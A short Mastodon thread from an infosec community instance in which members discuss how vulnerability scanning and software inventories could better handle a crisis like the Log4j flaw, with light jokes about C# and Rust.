Follow

is showing us that the current state of vulnerability scanning technology is insufficient. Who has ideas on how to improve in a way that would make it possible to properly handle a event?

@seb you probably want to look at the work of the OpenSSF :)

@seb I think the number one thing that would have helped us is a *proper* software inventory: vendors, versions, dependencies, libraries, etc, so we could have more easily targeted our efforts.

@seb

facetious answer: use c#. interestingly i wonder if the log4net library is similarly compromised.

better answer: there are some great resources out there that detail how to exploit, detect, patch & test: motasem-notes.net/the-log4j-vu

@seb

the link i sent before explains how nmap and burp can be used to scan for susceptible jars.

perhaps companies will now begin thinking about baking pentesting into the CI/CD pipeline as opposed to an annual pentest audit.

@seb [only partly joking] rewrite it all in Rust-lang, (they have relatively low cases of smugness, despite having all of the "we told you so" high ground.)

Sign in to participate in the conversation
IOC.exchange

INDICATORS OF COMPROMISE (IOC)
InfoSec Community within the Fediverse. Newbies, experts, gurus - Everyone is Welcome! Instance is supposed to be fast and secure.

We have a Getting Started Guide here: https://ioc.wiki/mastodon

HAVE FUN and STAY SAFE!